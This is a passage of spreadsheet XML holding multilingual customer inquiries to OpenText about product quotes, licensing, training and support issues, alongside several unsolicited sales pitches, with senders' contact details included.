Please reply back and let me know how we can assist in your next event, we staff nationwide. I look forward to hearing from you._x000D_
_x000D_
PS. I also provide staff if you need assistant with SETUP/BREAKDOWN for your event!!_x000D_
_x000D_
-- _x000D_
Best,_x000D_
_x000D_
Janelle Brice, MBA _x000D_
Owner/CEO, Davis Wick Talent LLC._x000D_
(407) 369-1614_x000D_
janelle.brice@daviswicktalent.com_x000D_
www.daviswicktalent.com</t>
  </si>
  <si>
    <t>ghj</t>
  </si>
  <si>
    <t>Follow up application status</t>
  </si>
  <si>
    <t>Would like a quote for 5 Brava Desktop IXL seats with annual maintenance.  Do you have a Corporate Discount?_x000D_
Thanks,_x000D_
Rod</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I was wondering if you can forward me to the right person in your company. My name is Nini and I am with Las Vegas Tradeshow Production. I see that your Company is exhibiting at GS1- Global Language of Business on June 20-22, 2017 in Las Vegas. I would like to send over some information about tradeshow-related services that we offer. _x000D_
I would appreciate it if you can direct me to the right person or department. Thank you so much for your time. _x000D_
Looking forward to hearing from you. _x000D_
Best,_x000D_
Nini Weitz_x000D_
24 Seven Productions | Tradeshow Assistant _x000D_
4065 West Mesa Vista, Suite E, Las Vegas, NV 89118_x000D_
O: 702.731.2470 x118│  www.24SevenPro.com_x000D_
 www.LasVegasTradeshowProduction.com |  _x000D_
</t>
  </si>
  <si>
    <t>Document Capture solution</t>
  </si>
  <si>
    <t>Repeated fax calls to the Emergency Operations Center in Richland, WA at phone #509-376-2900.  STOP THESE CALLS IMMEDIATELY.  EMERGENCY LINES CANNOT BE TIED UP BY JUNK CALLS!</t>
  </si>
  <si>
    <t>Would like to get a quote for using Right Fax to send faxes from a desktop client.  Also need to know requirements (virtual server OK, version of OS, RAM, disk space, etc).</t>
  </si>
  <si>
    <t>Good day, we are embarking on a Digitization and Document Management project for our Records Office and would like to know whether OpenText can assist us in this regard.</t>
  </si>
  <si>
    <t xml:space="preserve">I need an invoice for the $100 charge on my business account made on or around 4/6/17 for Account #861835 please. Thanks. </t>
  </si>
  <si>
    <t>Are edocs HIPPA compliant (if the doc is accessed on a locked computer)? Id like to keep all forms (in a private therapy practice) online rather than printing and storing paper copies of HIPPA, Office Procesures, etc.</t>
  </si>
  <si>
    <t>Update training CS10.5 to CS16</t>
  </si>
  <si>
    <t>Olá,_x000D_
Estou interessado em entender quais seriam os custos para implantação da ferramenta de ECM e saber se vocês teriam casos de exemplo para termos como base comparativa._x000D_
Nossa necessidade aqui na Secretaria da Fazenda é a implantação de uma solução para gestão de documentos, visando a eliminação de tramitação de processos e documentos em papel._x000D_
Contudo, temos uma preocupação muito grande com os custos de aquisição e manutenção de uma solução como essa._x000D_
Desde já agradeço.</t>
  </si>
  <si>
    <t>Please contact me to discuss an open balance on the Xerox account for Actuate Corporation.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to open a presales case for one of our European financial customers. Due to NDA requirements, we cannot disclose their identity at this stage._x000D_
_x000D_
We are currently analyzing and envisioning a pricing simulation solution that allows them to enrich large volumes of data, transform them through basic but user friendly modifiable matrices (costs per transaction and many others) to finally pivot on the results (e.g. with export to Excel). But most of all, it needs to be one unified user interface that is very easy to use and intuitive and needs to lightning fast. This cannot be a cloud solution._x000D_
</t>
  </si>
  <si>
    <t>We are looking at replacing our Sharepoint installation.  We have 170 users.  Looking for info and pricing.</t>
  </si>
  <si>
    <t>Asking about availability of DM 16 Administration training courses.</t>
  </si>
  <si>
    <t>Dear Ladies and Gentlemen,_x000D_
_x000D_
we, Prianto GmbH, www.prianto.com are an international acting software distributor. In this case one of our reseller partners wants to purchase _x000D_
following product(s): _x000D_
_x000D_
2 x Brava! Desktop TX Image only TIFF, PDF,  JPG, PS/EPS seat license , ESD_x000D_
incl. support/maintenance 1y_x000D_
_x000D_
Please quote us reseller prices/discount rates for above position(s) and tell us also about the _x000D_
 _x000D_
-       	the way you deliver this _x000D_
-       	times of delivery and/or handling_x000D_
-       	the costs of freight/handling/customs_x000D_
-      	optional or necessary maintenance (very important); does maintenance/support end after a period automatically or does it automatically extend for another period?_x000D_
-      	SKU number if available/existing_x000D_
-	 	is it possible to setup end user as your license partner – not us? We are only invoice recipient _x000D_
-		please tell us also full company data from yours, with email, telephone and address data. A full imprint or a link to it on your website_x000D_
_x000D_
It would be additionally helpful if you can send us also an overview (pricelist with list price and our conditions/purchase prices) of your products which could be interesting for us as a potential reseller/distributor partner from you._x000D_
_x000D_
Thank you very much -_x000D_
kind regards,_x000D_
_x000D_
Torsten Meyer_x000D_
Sales Manager_x000D_
Prianto GmbH</t>
  </si>
  <si>
    <t>Bom dia, baixei essa nova versão para analise e tenho problemas ao abrir arquivos TIFF acima de 1.199 kb, como resolver?</t>
  </si>
  <si>
    <t>I'm looking to download BIRT iHub F-Type but every link is leading me to a 45 day trial of the premium iHub software. For example: http://www.actuate.com/resources/landingpages/?articleid=32942# _x000D_
_x000D_
How can i find the download page for the F-Type?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>interested in the e.docs product</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren_x000D_
_x000D_
Könnten Sie mir bitte eine Produktbeschreibung/Produktdokumentation von OpenText MBPM zustellen?_x000D_
_x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Freundliche Grüsse _x000D_
Julia Herzberger</t>
  </si>
  <si>
    <t>Hi. Prior to updating to Brava! Reader Build: 16.2.0.149 Package: 16.2.0.76 i could view Tiff G4 files. Now I cant. Can you help me? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings._x000D_
Please tell me about follows._x000D_
1.  In Brava! Reader, is a license free?_x000D_
2.  In Brava! Reader, is commercial use possible?_x000D_
We want to use Brava!Leader in our office._x000D_
Please give me the answer by an email._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Goog Morning,_x000D_
 _x000D_
My interest is to acquire the license for development , my goal is to create applications built on this platform , then market them . I appreciate indicate the cost for ( OpenText _x000D_
Gupta Team Developer ). And I could pay by credit card ?_x000D_
 _x000D_
I am independent developer , but I'm forming as a company in Colombia - South America, I would like a quote , with a development license, i have worked in the win32 version 2005.1_x000D_
 _x000D_
Best Regards._x000D_
</t>
  </si>
  <si>
    <t>Attempting to make payment by credit card for ref # SCCU00026530, Renewal No # RC167696 for $780.03AUD</t>
  </si>
  <si>
    <t>Explore OpenText™ Report &amp; Output Management, Interface for SAP®</t>
  </si>
  <si>
    <t>I have been using [FREE Brava! DWG Viewer]._x000D_
After updating from version 16.0 to 16.2, japanese fonts in the DWG and DXF files can not be displayed._x000D_
Is it possible to display with [Brava! Desktop DXP] ?_x000D_
I look forward to hearing from you soon.</t>
  </si>
  <si>
    <t>ECM Solution, Replacing Filenet P*</t>
  </si>
  <si>
    <t>We are putting together an RFP for a WCMS for all of our applications. I would like to include OpenText as a candidate for this RFP._x000D_
_x000D_
Please reach out to me via email or phone as soon as possible to be considered.</t>
  </si>
  <si>
    <t xml:space="preserve">Support for licensing with Imaging for Windows 4.0_x000D_
User is receiving error that the SN provided is not valid for a signal user license. The software is being moved from system to another. _x000D_
License Key: RNS9U-5MGVP-SQYMK-RDFHF-CM69J </t>
  </si>
  <si>
    <t>We are interested in learning more about OpenText Conflicts Management LegalKEY Edition</t>
  </si>
  <si>
    <t xml:space="preserve">I want to talk with someone about document management services. Currently we use a ten year old version of Documentum and we are exploring options on moving to a new technology. I would like to set up a 60 minute demo with the IT team that will inform them of your newest DMS software. </t>
  </si>
  <si>
    <t xml:space="preserve">ISO 22316: 2017 Partnership to Adapt Internal Control Functions and CGUs to Results-Based Risk Management_x000D_
_x000D_
We are pleased to bring to your attention the offer of technical alliance that stakeholders (banks, insurance, local authorities, industries and services) can take advantage of with an immediate impact on the on the cash and regulatory capital. It is the ISO 22316: 2017 standard recommended as of March 2017 an Interdisciplinarity tool for the effectiveness of Enterprise Risk Management (ERM):_x000D_
Interdisciplinarity involves combining the management disciplines governing the internal control functions (Finance and Analysts, HR, OM and Operational Units or Cash Generating Units, CGUs) into a single activity through interaction based on the threshold of Risk appetite determining the outcome of the organization._x000D_
_x000D_
The technical alliance offer aims at transferring the technology required by online training in 5 days with SaaS simulation workshops, internal teams of banks and insurance and risk counterpart (local authorities, industry and Services) to the Intranet processes Management accounting currently lacking to:_x000D_
(a) Anticipate and Mobilize HR to cope with real-time operational losses and reduce uncertainty about the objectives of the organization;_x000D_
_x000D_
(b) Perform the accounting treatment of operational risk data relating to Expected Losses (EL) of operations upstream of Mathematical Calculations, _x000D_
_x000D_
(c) Plan ROI improvement and_x000D_
_x000D_
(d) Address deficiencies in compliance reporting with the Investor's continuing disclosure obligation (all sectors) and the Supervisor (Sectors subject to minimum capital). _x000D_
It is important to note:_x000D_
On the one hand, investor relations (IR) analysts and actuaries have been prepared by the Chartered Enterprise Risk Analyst (CERA) since 2009 to use the data processed by the Enterprise Risk Management accounting interaction processes of the Intranet IT-IRM (Investor Relationship Management) upstream of the decision-making tools._x000D_
_x000D_
On </t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde,_x000D_
_x000D_
Eu estou com um projeto de estudo para automatizar o recebimento de arquivos PDF, ler esse arquivo através de OCR e integrar no SAP. _x000D_
Quando eu trabalhava na ZF do Brasil, a mesma havia iniciado um contato com a OpenText (será que são vocês?) para "localizar" uma ferramenta utilizado pelo Grupo ZF, chamada invoice cockpit. Pela minha referencia atual, o projeto foi implementado e atende as expectativas._x000D_
Como agora eu tenho uma demanda similar, eu gostaria de saber se vocês tem alguma solução..._x000D_
_x000D_
Resumindo..._x000D_
Objetivo:_x000D_
Automatizar o processo de Nota Fiscal de Serviço, Faturas e Notas de Débito._x000D_
_x000D_
Cenário Atual:_x000D_
•	O fornecedor envia um e-mail com o arquivo em PDF ou envia em papel._x000D_
•	O conferente faz download do arquivo do e-mail e salva em um local da rede ou digitaliza o documento e salva em um local da rede. _x000D_
•	O conferente inicia no SAP o processo de validação e registro do documento, digitando as informações e fazendo upload do arquivo PDF._x000D_
_x000D_
Cenário Proposto:_x000D_
•	O fornecedor envia um e-mail com o arquivo em PDF ou envia em papel._x000D_
•	Um programa que capture do e-mail o arquivo PDF e converta em dados através de um software de captura inteligente de reconhecimento (OCR, ICR, etc)._x000D_
•	Ou o conferente digitalize o documento e disponibilize para o mesmo programa converter o PDF em dados._x000D_
•	O programa de conversão deve validar as informações e disponibilizar um arquivo xml, ou outro formato, com os dados e o arquivo PDF para integração com o SAP ao processo atual de validação e registro do documento._x000D_
_x000D_
Escopo: _x000D_
•	Principais prefeituras: Campinas, Itu, Salvador, São Paulo, Osasco e Curitiba._x000D_
•	Plantas Bosch: Brasil, Colômbia, Peru, Argentina e Chile._x000D_
•	Média: 27.000 páginas por divisão._x000D_
_x000D_
Requisitos mínimos do software:_x000D_
•	Capaz de armazenar layout de leitura._x000D_
•	Aprender caracteres._x000D_
•	Alto índice de reconhecimento._x000D_
•	Validador._x000D_
•	Gerar um arquivo de dados válidos ou enviar a informação para integrar no SAP._x000D_
_x000D_
Desde já, agradeço pela </t>
  </si>
  <si>
    <t>Solicito información con respecto a ApplicationXtender, deseo saber quien lo está distribuyendo en México.</t>
  </si>
  <si>
    <t>Waiting over a month for a "bug fix"_x000D_
Product is unusable_x000D_
What kind of customer expectations is your company concerned about?_x000D_
Poor product performance.  It is unusable waiting fro a bug fix._x000D_
Customer satisfaction rating......SAD!</t>
  </si>
  <si>
    <t>I want to know more about Qfinity</t>
  </si>
  <si>
    <t>Accessing input stream on 'beforeFactory' event to set on a new OdaDataSourceDesign element.</t>
  </si>
  <si>
    <t>I am looking to speak with someone about a possible opportunity. I have a client who is requesting pricing on a HIPAA compliant enterprise faxing solution. Would prefer a cloud-based solution if possible. Is this something that you can help me out with?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
This is to bring to your kind attention that we are running a Legal Process Outsourcing Company headquartered in New York, with office also in India. _x000D_
_x000D_
We would be very grateful to you if you could send us your quotation, with any terms and conditions of payments, of OpenText Contract Lifecycle Management tool._x000D_
_x000D_
Our requirement for the initial stage is of single user software that would help us manage the entire lifecycle of different types of contracts. We have recently got a big order and your promptness in sending us the quotation for the above mentioned product will definitely benefit both the companies._x000D_
_x000D_
I hope to have an early response from you._x000D_
_x000D_
Yours sincerely,_x000D_
Nidhi Singh_x000D_
Associate, Lexprocess_x000D_
</t>
  </si>
  <si>
    <t>We're working on a RFP for Document Management solution and we are interested in Documentum. Can someone reach out to discuss further?</t>
  </si>
  <si>
    <t>We are Documentum customers and are attempting to contact our sales rep.  We have questions about OpenText''s direction and how we go about purchasing software and services.</t>
  </si>
  <si>
    <t>Necesito activar 48 licencias de software Exceed 15 recién adquiridas</t>
  </si>
  <si>
    <t>11th Global Healthcare and Fitness Summit _x000D_
Held on October 16-18 2017 San Francisco California USA</t>
  </si>
  <si>
    <t>I'm inquiring to see if you have North American resellers for RightFax - ASP Support._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Down load free reader</t>
  </si>
  <si>
    <t>Would like to explore an opportunity to partner for a Canadian law firms segment</t>
  </si>
  <si>
    <t>Inquire about on-site training in Dynamic Case Management (DCM) for our developers, practice leads, and solution architects.</t>
  </si>
  <si>
    <t>Digital Rights Management requirements:_x000D_
File &amp; Folder permissions - beyond Microsoft Windows built-in standards_x000D_
File &amp; Folder tracking - beyond Microsoft Windows built-in standards_x000D_
Copy tracking and validation by user &amp; device - lockdown what devices (USB thumb drive) can access files</t>
  </si>
  <si>
    <t>Looking to resell a RightFax server to our client in South Carolina.  Need to verify RightFax meets client's requirements and get pricing ASAP.</t>
  </si>
  <si>
    <t>What is the difference between the TX and TXL versions of Brava Reader? Please send a comparison between these two versions.</t>
  </si>
  <si>
    <t xml:space="preserve">Get a High level quote for letter and document production_x000D_
---_x000D_
Hi,_x000D_
_x000D_
We are a professional association with 150 employees and 60k members.  We do communicate in various ways with our members and we are moving into a more digital approach. One component is our CCM solution._x000D_
_x000D_
We are at the early stage of an important project that will need to interact with a CCM solution to be implement before.  We are at the budget phase that should lead to a selection process.  We have looked at your product on the web and we may consider it for future evaluation. _x000D_
_x000D_
At this stage, we need to have an idea of the budget to be planned_x000D_
-	Solution (on-premise)_x000D_
-	Post-implementation Support (%)_x000D_
-	Coaching, training and support going live_x000D_
-	Professional service rates_x000D_
-	Other cost (ex. Specific software)_x000D_
_x000D_
As an hypothesis, we can provide you with the following numbers:_x000D_
•	Number of users that will use the tool for document production (ex. letters) : 40_x000D_
•	Number of users that will need access to letter design:  15_x000D_
•	Number of template (ex. Word) : 150_x000D_
•	Number of Email template : 20_x000D_
•	Number of document production per year: 50 000 to 70 000_x000D_
_x000D_
May you have any questions, please let me know_x000D_
Thank you_x000D_
_x000D_
François Grimard_x000D_
Architecte de systèmes d’information_x000D_
 _x000D_
ORDRE DES INGÉNIEURS DU QUÉBEC_x000D_
Gare Windsor, bureau 350_x000D_
1100, avenue des Canadiens-de-Montréal_x000D_
Montréal (Québec)  H3B 2S2_x000D_
Tél. : 514 845-6141, poste 3107_x000D_
Télécopie : 514 840-2075_x000D_
Cell : 514 919 4240_x000D_
Courriel : fgrimard@oiq.qc.ca _x000D_
www.oiq.qc.ca_x000D_
</t>
  </si>
  <si>
    <t>need end user number and System ID/Serial Number/PIN/VPS so I can get help to figure out why afp compare won't let me register it after I fill out our customer id and customer password. I start production support tomorrow and this needs to be resolved today.</t>
  </si>
  <si>
    <t xml:space="preserve">I am writing this e-mail as we at Bitdefender consider OpenText  to be a great potential partner of Bitdefender._x000D_
Bitdefender is the largest cyber-security technologies provider in the world._x000D_
For the last five years BD has been ranked top in AV independent tests (99% detection of 0-day malware):_x000D_
*AV Test – best protection against infections_x000D_
              - low impact on performance_x000D_
Link:  https://www.av-test.org/en/compare-manufacturer-results/ _x000D_
_x000D_
*AV Comparatives – best overall speed_x000D_
                                - proactive malware detection_x000D_
                                - real world protection_x000D_
Link: http://chart.av-comparatives.org/awards.php?year=2016 _x000D_
_x000D_
BD secures over 500 million users across the world making our company the leader in security industry._x000D_
Our Cloud Security for MSP protects systems using security technology that has been rated top in many independent tests._x000D_
*the security service is hosted on BD’s public cloud and is a centralized software as a service multiple deployment model._x000D_
*It does not require on site hardware._x000D_
*it has control Center web based management interface._x000D_
*Bitdefender Endpoint Security Tools (BEST), which is the local protection module deployed from the Console to the endpoints. _x000D_
_x000D_
It would be great to have the opportunity to share the above details of our MSP product with the right person in your company involved in decision making with reference to purchase of such products.  I would be more than happy to contact the respective person if I had the contact details. _x000D_
_x000D_
Much appreciated if I would hear from you. _x000D_
_x000D_
Best regards._x000D_
Colin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I working on a project to migrate a Viacom property. We are looking an OpenText but there is a need for a CMS that is integrated with the DAM. Ca you please provide any information about when TeamSite will be fully integrated with OpenText? _x000D_
_x000D_
Thank you._x000D_
_x000D_
Sheila Phalon_x000D_
Business Analyst_x000D_
Viacom _x000D_
1515 Broadway, New York, NY</t>
  </si>
  <si>
    <t xml:space="preserve">Versão 16.2 esta apresentando problema em imagem TIFs. Ao dar zoom os pixels estão "estourando" deixando a imagem ilegível._x000D_
_x000D_
Saberiam dizer se já tem ciência desse bug e se irão lançar uma versão para correção?_x000D_
_x000D_
No aguardo, abraços! </t>
  </si>
  <si>
    <t>Would like to know, do you have any developer licences? As we are supporting a project in Documentum with webtop. Client has the licence for the products but we don't have the developer licence &amp; can not access the latest products related to the Documentum / Opentext. How can we acquire the developer licence, so that we can access the new/updated products &amp; propose to the Opentext products as solutions to our client.</t>
  </si>
  <si>
    <t>Need to enquire about the training costs of your products. I am from HPE and working on a requirement and client has asked for your product. Need to include training cost in the proposal.</t>
  </si>
  <si>
    <t>I would like a cost to purchase 2Nr licenses for Brava! Reader, please can you email me a cost?_x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>We are interested in having a system for the management of documents, not so much emails, etc.  This may either be used within Legal only (around 20 people) or possible shared more widely within those in the company that frequently work with documents (possibly around 500 people).  Would like to receive quotes on suitable solutions.</t>
  </si>
  <si>
    <t>Fax access denied</t>
  </si>
  <si>
    <t>Hi,_x000D_
It is no longer possible to enter my psw for the GXS EDI Catalog._x000D_
If I ask to send me the psw again I will not receive anything at my email address. _x000D_
I ask for:_x000D_
Network ID:  BE015_x000D_
User ID:  BE015B_x000D_
Could you help me recover credentials?_x000D_
_x000D_
thanks_x000D_
Elisabetta</t>
  </si>
  <si>
    <t>Please provide the link to download opentext windows viewer for windows 10 OS.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
da ich leider keine E-Mail Adresse für Bewerber gefunden habe, bitte ich Sie meine Anfrage an die zuständige Personalabteilung weiterzuleiten. Vielen Dank vorab hierfür vorab._x000D_
_x000D_
Ich habe mich am 11.04.2017 im Rahmen einer dualen I.C.S Förderung um einen Fördervertrag an Ihrem Standort in München beworben. Von allen Unternehmen, die an der HAW Landshut präsentiert haben, interessiere ich mich gerade für Ihre Firma am meisten. Leider habe ich seit dem 11.04 keinerlei Empfangsbestätigung zum Eingang meiner Bewerbung, bzw. eine Einladung zu einem Vorstellungsgespräch erhalten. _x000D_
_x000D_
Daher möchte ich mich an dieser Stelle erkundigen, ob meine Bewerbung auch ihren Weg zu Ihnen gefunden hat, ob Sie mit dieser zufrieden sind oder ob Sie gern eventuell noch weitere Unterlagen oder Informationen von mir bräuchten._x000D_
_x000D_
OpenText hat mich überzeugt - und nun hoffe ich, dass meine Bewerbungsunterlagen dasselbe tun._x000D_
_x000D_
Ich würde Sie daher bitten, nochmals meine Bewerbung zu prüfen und mir ein Feedback zukommen zu lassen. Sehr gerne würde ich Sie persönlich kennen lernen, und Ihnen die Möglichkeit geben, mehr über mich zu erfahren. _x000D_
_x000D_
Über eine positive Nachricht Ihrerseits würde ich mich sehr freuen._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
Daniel Rudjaschko_x000D_
Bewerber um einen Fördervertrag im Rahmen des I.C.S. ev / Student der Wirtschaftsinformatik HAW Landshut _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Java error while starting the Command Centre Service for Exstream Engine. Error msg below:_x000D_
"java.net.BindException: Address already in use: JVM_Bind_x000D_
INFO   | jvm 2    | 2017/04/27 15:23:21 | Java HotSpot(TM) 64-Bit Server VM warning: ignoring option MaxPermSize=128m; support was removed in 8.0_x000D_
ERROR  | wrapper  | 2017/04/27 15:23:21 | JVM exited while loading the application._x000D_
STATUS | wrapper  | 2017/04/27 15:23:25 | Launching a JVM..._x000D_
INFO   | jvm 3    | 2017/04/27 15:23:26 | Error: Exception thrown by the agent : java.rmi.server.ExportException: Port already in use: 1616; nested exception is: "</t>
  </si>
  <si>
    <t>営業部 ご担当者様_x000D_
　_x000D_
はじめまして。_x000D_
バリューコールの長谷川友紀奈と申します。_x000D_
当社では、業界最安値の58円で電話営業をお手伝いさせていただいております。_x000D_
日ごろ企業様で発生する資料送付許諾からフォローコールやテレアポなど、_x000D_
営業活動の負荷になる部分を代行しております。_x000D_
　_x000D_
【当サービスのホームページ】： https://www.コールセンター.net_x000D_
　_x000D_
　_x000D_
直近の実績といたしましては、_x000D_
●メーカー様［展示会後フォローコールで商談回数が2 倍に！］_x000D_
●通信会社様［購入後の御礼コールでリピート率が2.5 倍に！］_x000D_
●専門商社様［キャンペーン案内コールで新規購入率が3 倍に！］_x000D_
●物流会社様［資料送付の許諾コールで資料開封率が12 倍に！］_x000D_
　_x000D_
いずれも、短期間で売上アップや営業効率の改善に繋がった実績が出ています。_x000D_
　_x000D_
　_x000D_
今回は貴社ホームページを拝見し、営業面で貢献できるのではないかと思い、_x000D_
私長谷川が、個別に連絡をさせていただきました。_x000D_
当社ではプロのテレオペレーターが毎日企業様の営業活動をサポートしており、_x000D_
すでに全国で300 社以上の導入実績がございます。_x000D_
　_x000D_
詳細は当サービスのホームページに記載しておりますので、_x000D_
ご興味お持ちいただければ大変光栄です。_x000D_
以上、長文となりましたがご一読くださり誠にありがとうございました。_x000D_
　_x000D_
　_x000D_
【業界最安値のコールセンター代行 バリューコール】_x000D_
ホームページ： https://www.コールセンター.net_x000D_
フリーダイヤル：0120-900-108_x000D_
株式会社イクイップ　東京都港区南青山2-2-15_x000D_
営業統括　長谷川友紀奈_x000D_
　_x000D_
　_x000D_
★バリューコール説明会のご案内★_x000D_
毎週金曜日に新宿の会議室にて説明会を開催しております。_x000D_
お気軽にお電話でお問合せください。</t>
  </si>
  <si>
    <t>Need to confirm the OCC version we are using</t>
  </si>
  <si>
    <t>I need to do an assignment and assumption for a portion of a business we purchased. They have services with EasyLink we need to move under our company.</t>
  </si>
  <si>
    <t>Need quote for NFS Solo maintenance. 1-4 users.  Part number MAINT-MAMPI665700M.  We are not the end user.  We are filling a quote for GSA for a long list of items for a government customer.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We will like to discuss the following :_x000D_
1. Full direct Partnership with Opentext for Professional &amp; Managed Services _x000D_
2. Presenlty working on a lead and will like to sponsor client to canada for Openworld_x000D_
3. Explore other opportunties within West Africa  </t>
  </si>
  <si>
    <t>I represent Wells Fargo’s Program and Governance/Application Competency Center. I am the Product Owner for all RightFax applications that are installed within Wells Fargo. Vulnerability scanning within our organization has identified RightFax MFP Module as being associated to CVE-2010-1558. What can you tell me about this issue and the steps we need to address the issue?</t>
  </si>
  <si>
    <t>I'd like to associate my OpenText account with our support to access MySupport</t>
  </si>
  <si>
    <t>Estamos buscando uma solução para substituição de nossa ferramenta de GED/ECM.</t>
  </si>
  <si>
    <t>customer support</t>
  </si>
  <si>
    <t>I would like to know the training cost of OpenText Media Manager.</t>
  </si>
  <si>
    <t>we are currently on edocs (cyberdocs) v 5.3.1_x000D_
_x000D_
Looks like the latest april microsoft security patches has caused the  DM server(service) to start.  I was wondering if you have heard of this issue and if there is a work around._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Vince Bennett, and I specialize in E-commerce sales for Bench &amp; Field Pet Foods, LLC. Our company is in the process in becoming a vendor for PetSmart. We currently don't have a EDI, and OpenText was recommended by the PetSmart team. In order to move forward, we need to finalize our EDI form!_x000D_
Thank you,_x000D_
Vincent Bennett_x000D_
vince@benchandfield.com</t>
  </si>
  <si>
    <t xml:space="preserve">Prezados,_x000D_
_x000D_
Internalizamos demanda para aquisição de Ferramenta de Workflow com Recursos de Captura de Imagens/Documentos e GED que tem como característica instituir um projeto corporativo para implantação de Gerenciamento Eletrônico de Documentos – GED, possibilitando a implantação de um sistema de melhoria no controle de gestão documental, através da implementação de suporte tecnológico que possibilite uma maior governança do Banco, e ao mesmo tempo agilize os processos de negócio, diminuição de custos e consequente diminuição na burocratização dos mesmos, assim como mitigação de risco operacional, dentre outros. Em consulta ao Quadrante Mágico da Gartner referente a soluções de ECM, verificamos que a hyland se posiciona como uma da 4 empresas líderes de solução, por causa disso formalizamos este e-mail afim de conhecer e principalmente formatar uma proposta comercial para levantar os custos necessários para implantarmos a solução que atenda a instituição._x000D_
_x000D_
A ferramenta deverá ser Workflow, a qual deverá suportar os fluxos de processos de negócio da Instituição a serem modelados em BPM, tendo como premissa a execução e gestão dos fluxos, de forma a automatizar processos de negócio, nos quais os documentos, informações e tarefas deverão passar de empregado para empregado, seguindo hierarquia estabelecida e de acordo com o conjunto pré-estabelecido de regras._x000D_
Conforme estabelecido pela governança do projeto GED os primeiros processos de negócio a serem abrigados pela ferramenta de Workflow são: Cadastro de Clientes, Abertura de Contas e Crédito. Tal ferramenta deverá abrigar também outros processos de negócio a serem definidos pela governança do projeto GED a partir da conclusão de implantação dos primeiros processos._x000D_
_x000D_
Além da tramitação automatizada, a ferramenta de Workflow deverá estar integrada a um software de captura de imagens, GED e Repositório Eletrônico de Documentos, proporcionando maior gestão do processo e trânsito de documentos eletrônicos entre </t>
  </si>
  <si>
    <t>Trying to update the reader program. Cant seem to find the correct link</t>
  </si>
  <si>
    <t xml:space="preserve">I'm supporting a customer (United Launch Alliance) that has a licensed instance of CS10.  (My IBM e-mail address is "dllamber@us.ibm.com").  Another ULA person you have exchanged e-mail with is Steve Rochford.  I'm able to log into OpenText Connct, but when I follow the "My Support" link, I get the message_x000D_
_x000D_
  No Access_x000D_
  We're sorry, your account does not grant you access to this resource._x000D_
</t>
  </si>
  <si>
    <t>I am looking for information on your Banking and Compliance solutions that particularly relate to/use  Microsoft and more specifically Azure for a customer of mine. Appreciate quick response.</t>
  </si>
  <si>
    <t xml:space="preserve">Needs info on the pharma softwares for customer manufacturer I the pharma sector in yemen </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
Hope you’re doing great._x000D_
_x000D_
I am writing to check if you would be interested in acquiring a list of "SAP" users for your unlimited usage? _x000D_
_x000D_
We have got data for:_x000D_
_x000D_
•	SAP Crystal Report _x000D_
•	SAP Business Objects_x000D_
•	SAP ERP Central Component (ECC)_x000D_
•	SAP Sybase _x000D_
•	SAP NetWeaver  _x000D_
•	SAP Succesfactors _x000D_
•	SAP R3 _x000D_
•	SAP HANA _x000D_
•	SAP Business One _x000D_
_x000D_
We specialize in building customized lists as per our client's requirements as well._x000D_
_x000D_
Please advise if we may connect on a call at your convenience and we can discuss the next steps accordingly._x000D_
_x000D_
I appreciate your time and look forward to your response. _x000D_
_x000D_
Best regards,_x000D_
Jordon Miller_x000D_
Lead Generation department_x000D_
Brigade_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Do you still give StreamServe training?</t>
  </si>
  <si>
    <t>Question regarding how to handle nested tables in Exstream._x000D_
_x000D_
I have data in xml that looks as follows and would like to display in Exstream as nested tables with coverages being within locations:_x000D_
_x000D_
  &lt;locations&gt;_x000D_
	  &lt;location&gt;_x000D_
		&lt;locationAddress1&gt;500 King St S&lt;/locationAddress1&gt;_x000D_
		&lt;locationAddress2&gt;PO Box 500&lt;/locationAddress2&gt;_x000D_
		&lt;locationAddressCity&gt;Waterloo&lt;/locationAddressCity&gt;_x000D_
		&lt;locationAddressProv&gt;ON&lt;/locationAddressProv&gt;_x000D_
		&lt;locationAddressPC&gt;N2K 4B6&lt;/locationAddressPC&gt;_x000D_
		&lt;locationOccupancy&gt;OFFICE BLDG (10 Storeys or Less) - Multi Occupancy - Owner Risk&lt;/locationOccupancy&gt;_x000D_
		&lt;locationConstruction&gt;Masonry with steel studs&lt;/locationConstruction&gt;_x000D_
		&lt;coverages&gt;_x000D_
			&lt;coverage&gt;_x000D_
				&lt;coverageName&gt;COMMERCIAL BUILDING BROAD FORM PLUS&lt;/coverageName&gt;_x000D_
				&lt;coverageForm&gt;2188&lt;/coverageForm&gt;_x000D_
				&lt;coverageCoins&gt;90&lt;/coverageCoins&gt;_x000D_
				&lt;coverageDeductible&gt;1000&lt;/coverageDeductible&gt;_x000D_
				&lt;coverageLimit&gt;925000000&lt;/coverageLimit&gt;_x000D_
				&lt;coverageRate&gt;0.090&lt;/coverageRate&gt;_x000D_
				&lt;coveragePremium&gt;839610&lt;/coveragePremium&gt;_x000D_
			&lt;/coverage&gt;_x000D_
			&lt;coverage&gt;_x000D_
				&lt;coverageName&gt;COMMERCIAL EQUIPMENT BROAD FORM PLUS&lt;/coverageName&gt;_x000D_
				&lt;coverageForm&gt;3188&lt;/coverageForm&gt;_x000D_
				&lt;coverageCoins&gt;80&lt;/coverageCoins&gt;_x000D_
				&lt;coverageDeductible&gt;2000&lt;/coverageDeductible&gt;_x000D_
				&lt;coverageLimit&gt;125000000&lt;/coverageLimit&gt;_x000D_
				&lt;coverageRate&gt;0.095&lt;/coverageRate&gt;_x000D_
				&lt;coveragePremium&gt;114336&lt;/coveragePremium&gt;_x000D_
